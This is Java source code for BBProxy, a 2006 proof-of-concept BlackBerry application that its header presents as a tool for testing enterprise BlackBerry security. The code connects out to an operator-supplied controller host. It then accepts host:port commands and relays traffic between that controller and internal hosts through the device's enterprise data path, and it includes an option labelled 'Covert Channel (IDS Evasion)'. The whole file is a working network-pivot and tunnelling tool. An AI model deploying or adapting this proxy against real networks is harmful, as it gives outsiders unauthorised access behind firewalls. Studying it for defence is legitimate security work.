/*
 *  BBProxy 0.1 Proof-of-concept tool to test the security of Blackberry installation.
 *
 *  Copyright (C) 2006  Jesse D'Aguanno, Praetorian Global LLC
 *
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
 *  
 *  NOTE: This and any related software is for educational purposes only and is 
 *  intended for use by security professionals and administrators in order to
 *  test the security of their own networks. Please obtain prior permission  
 *  before testing this in any way. Any misuse of this or any related software
 *  is at the sole risk and responsibility of the user.
 */
import net.rim.device.api.ui.component.*;
import net.rim.device.api.ui.container.*;
import net.rim.device.api.ui.*;
import java.io.*;
import javax.microedition.io.*;
import net.rim.device.api.i18n.*;

import net.rim.device.api.system.RadioInfo;

public class BBProxy extends UiApplication implements Runnable {
    
    public static String MASTERURL;
    public static String HELLO = "Please enter destination host and port as <host>:<port>\n";
    

    public static void main(String[] args) {
        BBProxy app = new BBProxy();
        app.enterEventDispatcher();
    }
    //
    
    String masterHost;
    int masterPort;
    
    public boolean _isRunning;

    public MenuItem _go = new MenuItem("Connect", 100, 10) {
        public void run() {
            
            //don't do anything unless there is a host name in the _host field
            if ( _host.getText().length() > 0 ) {
                masterHost = _host.getText();
            } else {   
                //Dialog.ask(Dialog.D_OK, _resources.getString(BBProxy_ENTERHOSTNAME));
                Dialog.ask(Dialog.D_OK, "Please enter a valid host name.");
            }
            //int masterPort = 0;
            try {
                masterPort = Integer.parseInt(_port.getText());
            } catch (Exception e) {
                Dialog.ask(Dialog.D_OK, "Please enter a valid port number.");
            }
            try {
                
                if (masterPort < 1 || masterPort > 65535) {
                    
                    Dialog.ask(Dialog.D_OK, "Please enter a valid port number.");
                } else {
                    
                    String masterDeviceside;
                    if (_toggleDirectConn.getChecked() || _toggleIDSEvade.getChecked()) {
                        masterDeviceside = ";deviceside=true";
                    } else {
                        masterDeviceside = ";deviceside=false";
                    }
                    
                    MASTERURL = "socket://" + masterHost + ":" + masterPort + masterDeviceside;
                    
                    synchronized(getLockObject()) {
                        if ( !_isRunning ) {
                            try {
                                _isRunning = true;
                                new ConnectThread().start();
                                
                            } catch (Exception e) {
                                updateDisplay("ERROR: Won't start BBProxy()");
                            }
                        }
                    }
                }
            } catch (Exception e) {
                System.err.println("Some problem with port code.");
                
            }
    

        }
    };
    
    
    public void run() {
    
    }
    
        
    
    public EditField _host = new EditField("Host: ", "");
    public EditField _port = new EditField("Port: ", "");
    private CheckboxField _toggleDirectConn = new CheckboxField("Direct TCP (no MDS)", RadioInfo.getNetworkType() == RadioInfo.NETWORK_IDEN);
    private CheckboxField _toggleIDSEvade = new CheckboxField("\"Covert\" Channel (IDS Evasion)", RadioInfo.getNetworkType() == RadioInfo.NETWORK_IDEN);
        
    
    public RichTextField _rtf = new RichTextField();
    public StringBuffer _message = new StringBuffer();
    

    
    
    public class BBProxyScreen extends MainScreen {
        protected void makeMenu(Menu menu, int instance) {
            if ( !_isRunning ) {
                menu.add(_go);
            }
            menu.addSeparator();
            super.makeMenu(menu, instance);
        }
    }
    
    
    InputStream masterIn;
    OutputStream masterOut;


    private class ConnectThread extends Thread {
        
        public void run() {
            SocketConnection connection = null;
            try {
                
                
                updateDisplay("Opening Connection...");
                try {
                    connection = (SocketConnection)Connector.open(MASTERURL);
                    String localip = connection.getLocalAddress();
                    System.err.println("Local IP Address="+localip);
                    updateDisplay("Local IP Address="+localip);
                    
                    
                } catch (Exception e) {
                    System.err.println("Error Opening Stream Connector");
                }
                
                
                try {
                    masterIn = connection.openInputStream();
                } catch (Exception e) {
                    System.err.println("Error With InputStream");
                }
                try {
                    masterOut = connection.openOutputStream();
                } catch (Exception e) {
                    System.err.println("Error With OutputStream");
                }
                

                updateDisplay("Connected to "+masterHost+":"+masterPort+" and awaiting commands.");
     
                //connection.setSoTimeout(50);
            } catch (Exception e) {
                updateDisplay("Error connection to "+masterHost+":"+masterPort);
                //System.err.println("Error connection to "+masterHost+":"+masterPort);
                e.printStackTrace();
                return;
            }

            //System.out.println("Connected to "+masterHost+":"+masterPort+" and awaiting commands.");
            //updateDisplay("Connected to "+masterHost+":"+masterPort+" and awaiting commands.");
            byte[] hello = "Please enter destination host and port as <host>:<port>\n".getBytes();
            try {
                masterOut.write(hello);
                //masterOut.write(0x0d);
                masterOut.flush();
            } catch (IOException e) {
                System.err.println("Write Failed.");
            }
            //While loop removed so proxy will not sample any data after connect. Must change to allow secondary connections.
            //while (true) {

                try {
                    boolean readLine = false;
                    StringBuffer buf = new StringBuffer();
                    //int avail = masterIn.available();
                    //byte[] buffer = new byte[avail];
                    while(!readLine) {
                    
                        //int avail = masterIn.available();
                        int avail = 1;
                        //int avail = masterIn.count()-1;
                        //System.err.println("Size of Buffer="+avail);
                        //if (avail > 0) {
                            
                            //Added
                            /*while((buffer = masterIn.read()) != -1){
                                buf.append(new String(buffer));
                            }
                            readLine = true;
                            */
                            //End of Added
                            
                            
                            
                            byte[] buffer = new byte[avail];
                            masterIn.read(buffer);
                            buf.append(new String(buffer));
                            //System.err.println("Received byte="+buf.toString());
                            //System.err.println(new String(buffer));
                            for (int i=0; i<buffer.length&&!readLine; i++) {
                                System.err.println("buffer[i] == "+buffer[i]);
                                if (buffer[i] == '\r' || buffer[i] == '\n') {
                                    //System.err.println("Got Line... = "+ buf.toString());
                                    readLine = true;
                                }
                            }
                            //End of Deleted
                            
                            
                       // }
                    }
                    String tmp = buf.toString().trim();
                    startProxy(tmp);
                    masterOut.flush();
                } catch (Exception e) {
                    System.err.println("Can't handle this stress....");
                    updateDisplay("Can't handle this stress....");
                    //e.printStackTrace();
                    return;
                }
            //}
         
        //End of removed while loop
        }

        public void startProxy(String tmp) {
            //Set up client socket Info
            int pos = tmp.indexOf(":");
            if (pos < 1)
                return;
            String host;
            int port;

            try {
                host = tmp.substring(0,pos);
                port = Integer.parseInt(tmp.substring(pos+1));
            } catch (Exception e) {
                //System.err.println("Erroring parsing host:port from '"+tmp+"'");
                updateDisplay("Erroring parsing host:port from '"+tmp+"'");
                //e.printStackTrace();
                return;
            }
            
            //Big chage here to thread for second connect (All moved to proxy() class)
            proxy p = new proxy(masterIn, masterOut, host, port);
 
 
        }
    }
     
    public BBProxy() {
        //Create a new screen for the application
        BBProxyScreen screen = new BBProxyScreen();

        //Add the title for this screen
        //screen.setTitle(new LabelField(_resources.getString(BBProxy_TITLE), LabelField.ELLIPSIS | LabelField.USE_ALL_WIDTH));
        screen.setTitle(new LabelField("Blackberry Proxy", LabelField.ELLIPSIS | LabelField.USE_ALL_WIDTH));

        //Add the host name field to the screen
        screen.add(_host);
        screen.add(_port);
        screen.add(_toggleDirectConn);
        screen.add(_toggleIDSEvade);

        //Add the RTF to the screen
        screen.add(_rtf);

        //Push the screen onto the UI stack for rendering
        pushScreen(screen);
    }
    
   
                     
  
    
   
    class proxy implements Runnable {
        InputStream masterIn;
        OutputStream masterOut;
        String clientHost;
        int clientPort;
        proxy(InputStream masterIn, OutputStream masterOut, String clientHost, int clientPort) {
            this.masterIn = masterIn;
            this.masterOut = masterOut;
            this.clientHost = clientHost;
            this.clientPort = clientPort;
            Thread t0 = new Thread(this);
            t0.start();
            System.err.println("First Thread!");
        }
        public void run() {
            
            
            
            
            
            
            //Socket clientSocket;
            SocketConnection clientConnection = null;
            String clientURL = "socket://" + clientHost + ":" + clientPort + (_toggleDirectConn.getChecked() ? ";deviceside=true" : ";deviceside=false");
            //String clientURL = "socket://" + host + ":" + port + ";deviceside=false";
            //updateDisplay("URL Recieved: "+clientURL);
            InputStream clientIn;
            OutputStream clientOut;
          

            try {
                //Initiate actual Client Connection
                //clientConnection = (StreamConnection)Connector.open(clientURL);
                updateDisplay("Attempt Conn to: "+clientHost);
                clientConnection = (SocketConnection)Connector.open(clientURL);

                clientIn = (InputStream)clientConnection.openInputStream();
                clientOut = (OutputStream)clientConnection.openOutputStream();
                //clientSocket.setSoTimeout(50);
                masterOut.write("proxied\n".getBytes());
                masterOut.flush();
            } catch (Exception e) {
                System.err.println("Error connecting to "+clientHost+":"+clientPort);
                updateDisplay("Error connecting to "+clientHost+":"+clientPort);
                //System.err.
                e.printStackTrace();
                return;
            }

            //System.out.println("Proxying data from "+host+":"+port+" to "+masterHost+":"+masterPort);
            updateDisplay("Proxying data between "+clientHost+":"+clientPort+" and "+masterHost+":"+masterPort);
            
            master2clientComm comm1 = new master2clientComm(masterIn, clientOut);
            client2masterComm comm2 = new client2masterComm(clientIn, masterOut);
        }
    }
    
    class master2clientComm implements Runnable {
        //int masterAvail;
        InputStream masterIn;
        OutputStream clientOut;
        master2clientComm(InputStream masterIn, OutputStream clientOut) {
            this.masterIn = masterIn;
            this.clientOut = clientOut;
            //this.masterAvail = masterAvail;
            Thread t = new Thread(this);
            t.start();
            System.err.println("Threaded!");
        }
        public void run() {
            
            while(true) {
                
                int masterAvail = 0;
                //int clientAvail = 0;
                try {
                    masterAvail = this.masterIn.available();
                    System.err.println("masterAvail="+masterAvail);
                } catch (Exception e) {
                    e.printStackTrace();
 
                        return;
                }
                
                
             try {
                if (masterAvail == 0) {
                    masterAvail = 1;
                }       
                byte[] buf1 = new byte[masterAvail];
                masterIn.read(buf1);
                clientOut.write(buf1);
                clientOut.flush();
                
            } catch (Exception e) {
                System.err.println("Client disappeared....");
                updateDisplay("Client disappeared....");
                return;
            }

        }
        }
    
    }
    
    class client2masterComm implements Runnable {
        //int clientAvail;
        InputStream clientIn;
        OutputStream masterOut;
        client2masterComm(InputStream clientIn, OutputStream masterOut) {
            this.clientIn = clientIn;
            this.masterOut = masterOut;
            //this.clientAvail = clientAvail;
            Thread t2 = new Thread(this);
            t2.start();
            System.err.println("Threaded again!");
        }
        public void run() {
            while(true) {
                
                        //while (true) {
                
                int clientAvail = 0;
                try {
                    
                    clientAvail = this.clientIn.available();
                } catch (Exception e) {
                    e.printStackTrace();
                    //try {
                    //    clientConnection.close();
                    //} catch (Exception e2) {
                    //    // screw it...
                    //}
                        return;
                }    
                
                
                
                
                
            
            try {
                if (clientAvail == 0) {
                    clientAvail = 1;
                }       
                byte[] buf2 = new byte[clientAvail];
                clientIn.read(buf2);
                masterOut.write(buf2);
                masterOut.flush();
                
            } catch (Exception e) {
                System.err.println("Master disappeared....");
                updateDisplay("Master disappeared....");
                return;
            } 
                
            
        }
        }
    
    }
        
    
    public void updateDisplay(final String msg) {
        invokeLater(new Runnable() {
            public void run() {
                _message.append(msg);
                _message.append('\n');
                _rtf.setText(_message.toString());
            }
        });
    }

    public Object getLockObject() {
        return this;
    }
   
}
